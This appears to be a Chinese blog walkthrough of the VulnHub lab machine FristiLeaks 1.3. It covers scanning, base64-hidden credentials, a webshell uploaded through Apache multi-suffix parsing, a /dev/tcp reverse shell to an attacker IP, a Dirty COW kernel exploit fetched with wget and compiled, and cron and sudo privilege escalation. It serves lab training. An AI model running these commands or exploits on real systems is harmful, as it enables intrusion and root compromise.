FRISTILEAKS: 1.3打靶渗透【附代码】(权限提升)

靶机下载地址:FristiLeaks: 1.3 ~ VulnHubFristiLeaks: 1.3, made by Ar0xA. Download & walkthrough links are available.icon-default.png?t=N7T8https://www.vulnhub.com/entry/fristileaks-13,133/

1. 主机发现+端口扫描+目录扫描+敏感信息收集

1.1. 主机发现:

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:A5:A6:76'

1.2. 端口扫描:

nmap -p- 192.168.7.188

1.3. 目录扫描:

dirb http://192.168.7.188

1.4. 敏感信息收集:

操作系统:centOS;中间件Apache 2.2.15【后边有用】;语言php

2. WEB漏洞挖掘

2.1. 进入80端口

1.拼接目录扫描出的文件,/robots.txt

2.逐个拼接尝试【无用】 -> 返回初始页面,老规矩,逐个点就功能点,寻找疑似漏洞点 -> 拼接/fristi,进入一个登录页面

3.尝试万能密码无果,右键查看网站源代码 -> 发现图片下方存在一段base64加密字段,尝试解密

解码发现为png格式的数据信息,尝试利用kali自带的工具破解

4,将base64加密字段放入test.txt文件中,执行下方代码破解

base64 -d test.txt > test.png # base64 解码
cat test.png #查看
strings test.png
sz test.png # sz发送给自己 稍微等十几秒 按一下上下左右的右->键 一般就出来了

5.成功解析出一个图片,可能是账号也可能是密码

6.当初网页源代码也存在数据,疑似账号或者密码,尝试登录吧 -> 尝试得出账号密码[eezeepz:keKkeKKeKKeKkEkkEk]

2.2. 登入后台【eezeepz:keKkeKKeKKeKkEkkEk】

存在文件上传功能点 -> 尝试上传一句话木马文件 -> 黑白名单 无法利用文件上传漏洞

2.3. 尝试利用NDay获取权限

我们最初的漏洞流程挖掘流程起作用了,由于中间件为apache2.2.15版本,存在Apache HTTPD 多后缀解析漏洞:在有多个后缀的情况下,只要一个文件含有.php后缀的文件即将被识别成PHP文件。

1.尝试上传xxxxx.php.jpg文件

2.上传+改包

3.上传文件后给了路径 ->尝试蚁剑链接

2.4. 反弹shell至kali准备提权

nc -lvnp 4444 #kali打开监听接收
sh -i >& /dev/tcp/192.168.7.36/4444 0>&1 #在蚁剑执行反弹shell语句

3. 权限提升

3.1. 脏牛提权

1.权限为普通用户

2.查看版本信息

uname -a #查看系统的内核版本,为Linux 2.6.32-573.8.1.el6.x86_64

直接使用经典的脏牛漏洞,该漏洞影响 Linux 2.6.22 版本至 4.6 版本的所有 Linux 系统。

3.查找脏牛脚本 -> 用一个符合版本的脚本,将其导到当前路径

searchsploit 'Dirty COW'
searchsploit -m 40839.c

4.开启一个临时http服务,利用weget下载至靶机并赋予执行权限

python3 -m http.server 8001
wget 192.168.7.37:8001/40839.c
chmod +x 40839.c

5.编译并运行,密码自己设置,我这里设置6个6

gcc -pthread 40839.c -o 40839 -lcrypt
./40839

7.转换用户 -> 提权成功

su firefart

3.2. SUDO提权

1.返回/home,存在三个用户【admin\eezeepz\fristgod】

在eezeepz家目录下找到notes.txt

2.执行如下命令 -> 查看/tmp/cronresult

echo '/usr/bin/../../bin/chmod -R 777 /home/admin' > /tmp/runthis
cat /tmp/cronresult

3.成功cd到admin用户 -> 打开那两个txt文件,发现存着两个base64数据

cd /home/admin

cat cryptedpass.txt

mVGZ3O3omkJLmy2pcuTq

cat whoisyourgodnow.txt

=RFn0AKnlMHMPIzpyuTI0ITG

4.打开.py文件,存在一个加密脚本

import base64,codecs,sys

def encodeString(str):

base64string= base64.b64encode(str)

return codecs.encode(base64string[::-1], 'rot13')

cryptoResult=encodeString(sys.argv[1])

print cryptoResult

5.尝试逆转机密机制,并将脚本保存到kali的test2.py文件中

import base64,codecs,sys

def decodeString(str):
  rot13string = codecs.decode(str[::-1], 'rot13')
  return base64.b64decode(rot13string)

print(decodeString(sys.argv[1]))

6.运行test2.py解密程序,解密两组base64数据

python test2.py mVGZ3O3omkJLmy2pcuTq
>>>b'thisisalsopw123'

python test2.py =RFn0AKnlMHMPIzpyuTI0ITG
>>>b'LetThereBeFristi!'

7.登录fristigod,发现并不是root权限

su fristigod
LetThereBeFristi!

8.history查看历史命令,发现执行命令时会使用sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom

使用root权限输入命令后,加/bin/bash提权成功

sudo -u fristi /var/fristigod/.secret_admin_stuff/doCom /bin/bash

  • 28
    点赞
  • 23
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值